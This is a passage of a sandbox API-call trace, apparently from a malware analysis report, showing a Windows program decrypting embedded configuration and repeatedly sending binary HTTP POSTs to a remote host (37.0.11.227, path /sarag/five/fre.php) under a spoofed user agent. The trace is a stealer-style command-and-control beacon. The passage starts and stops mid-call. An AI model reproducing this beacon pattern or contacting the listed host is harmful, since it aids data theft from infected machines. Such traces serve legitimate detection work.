hHeap=0x690000) returned 1 [0211.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6f4) returned 0x4d8 [0211.144] Sleep (dwMilliseconds=0xea60) [0211.146] GetProcessHeap () returned 0x690000 [0211.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0211.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.147] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.153] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0211.159] GetProcessHeap () returned 0x690000 [0211.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0211.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.161] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.162] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.163] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.163] GetProcessHeap () returned 0x690000 [0211.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0211.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.172] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0211.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.173] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.174] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0211.174] GetProcessHeap () returned 0x690000 [0211.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0211.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.177] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.179] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.180] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.181] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.181] GetProcessHeap () returned 0x690000 [0211.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0211.181] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.182] GetProcessHeap () returned 0x690000 [0211.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0211.191] GetProcessHeap () returned 0x690000 [0211.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0211.192] GetProcessHeap () returned 0x690000 [0211.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.192] GetProcessHeap () returned 0x690000 [0211.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0211.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.203] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0211.212] GetProcessHeap () returned 0x690000 [0211.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0211.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.213] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.214] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.215] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.215] GetProcessHeap () returned 0x690000 [0211.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0211.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.216] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0211.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.217] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.218] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0211.218] GetProcessHeap () returned 0x690000 [0211.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.221] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0211.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.223] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0211.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.224] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0211.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.225] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0211.225] GetProcessHeap () returned 0x690000 [0211.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0211.225] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0211.225] GetProcessHeap () returned 0x690000 [0211.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0211.225] socket (af=2, type=1, protocol=6) returned 0x4dc [0211.226] connect (s=0x4dc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0211.253] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0211.253] GetProcessHeap () returned 0x690000 [0211.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0211.253] GetProcessHeap () returned 0x690000 [0211.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0211.253] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.255] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.255] GetProcessHeap () returned 0x690000 [0211.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0211.255] GetProcessHeap () returned 0x690000 [0211.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.256] GetProcessHeap () returned 0x690000 [0211.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0211.256] GetProcessHeap () returned 0x690000 [0211.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0211.257] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.257] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.258] GetProcessHeap () returned 0x690000 [0211.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0211.258] GetProcessHeap () returned 0x690000 [0211.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.258] send (s=0x4dc, buf=0x6ad508*, len=242, flags=0) returned 242 [0211.259] send (s=0x4dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0211.259] GetProcessHeap () returned 0x690000 [0211.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0211.259] recv (in: s=0x4dc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0211.335] GetProcessHeap () returned 0x690000 [0211.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0211.335] GetProcessHeap () returned 0x690000 [0211.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0211.336] GetProcessHeap () returned 0x690000 [0211.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0211.337] GetProcessHeap () returned 0x690000 [0211.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0211.337] closesocket (s=0x4dc) returned 0 [0211.338] GetProcessHeap () returned 0x690000 [0211.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0211.338] GetProcessHeap () returned 0x690000 [0211.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.338] GetProcessHeap () returned 0x690000 [0211.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.339] GetProcessHeap () returned 0x690000 [0211.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0211.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe28) returned 0x4dc [0211.341] Sleep (dwMilliseconds=0xea60) [0211.343] GetProcessHeap () returned 0x690000 [0211.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0211.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0211.357] GetProcessHeap () returned 0x690000 [0211.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0211.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.358] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.359] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.360] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.360] GetProcessHeap () returned 0x690000 [0211.361] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0211.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.363] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0211.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.364] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.366] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0211.366] GetProcessHeap () returned 0x690000 [0211.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0211.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.368] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.368] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.373] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.374] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.374] GetProcessHeap () returned 0x690000 [0211.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0211.374] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.374] GetProcessHeap () returned 0x690000 [0211.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0211.375] GetProcessHeap () returned 0x690000 [0211.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0211.376] GetProcessHeap () returned 0x690000 [0211.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.376] GetProcessHeap () returned 0x690000 [0211.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0211.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.386] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0211.393] GetProcessHeap () returned 0x690000 [0211.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0211.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.394] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.395] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.396] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.396] GetProcessHeap () returned 0x690000 [0211.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0211.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.399] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0211.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.400] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.401] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0211.401] GetProcessHeap () returned 0x690000 [0211.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.402] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0211.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.403] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0211.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.404] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0211.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.406] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0211.406] GetProcessHeap () returned 0x690000 [0211.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0211.406] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0211.406] GetProcessHeap () returned 0x690000 [0211.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0211.406] socket (af=2, type=1, protocol=6) returned 0x4e0 [0211.406] connect (s=0x4e0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0211.428] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0211.428] GetProcessHeap () returned 0x690000 [0211.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0211.428] GetProcessHeap () returned 0x690000 [0211.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0211.428] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.429] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.429] GetProcessHeap () returned 0x690000 [0211.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0211.429] GetProcessHeap () returned 0x690000 [0211.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.430] GetProcessHeap () returned 0x690000 [0211.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0211.430] GetProcessHeap () returned 0x690000 [0211.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0211.431] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.432] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.432] GetProcessHeap () returned 0x690000 [0211.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0211.432] GetProcessHeap () returned 0x690000 [0211.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.432] send (s=0x4e0, buf=0x6ab500*, len=242, flags=0) returned 242 [0211.433] send (s=0x4e0, buf=0x6aba40*, len=159, flags=0) returned 159 [0211.433] GetProcessHeap () returned 0x690000 [0211.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0211.433] recv (in: s=0x4e0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0211.507] GetProcessHeap () returned 0x690000 [0211.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0211.508] GetProcessHeap () returned 0x690000 [0211.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0211.508] GetProcessHeap () returned 0x690000 [0211.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0211.510] GetProcessHeap () returned 0x690000 [0211.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0211.510] closesocket (s=0x4e0) returned 0 [0211.511] GetProcessHeap () returned 0x690000 [0211.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0211.511] GetProcessHeap () returned 0x690000 [0211.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.512] GetProcessHeap () returned 0x690000 [0211.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0211.512] GetProcessHeap () returned 0x690000 [0211.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0211.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd94) returned 0x4e0 [0211.518] Sleep (dwMilliseconds=0xea60) [0211.520] GetProcessHeap () returned 0x690000 [0211.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0211.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.531] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0211.539] GetProcessHeap () returned 0x690000 [0211.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0211.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.540] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: 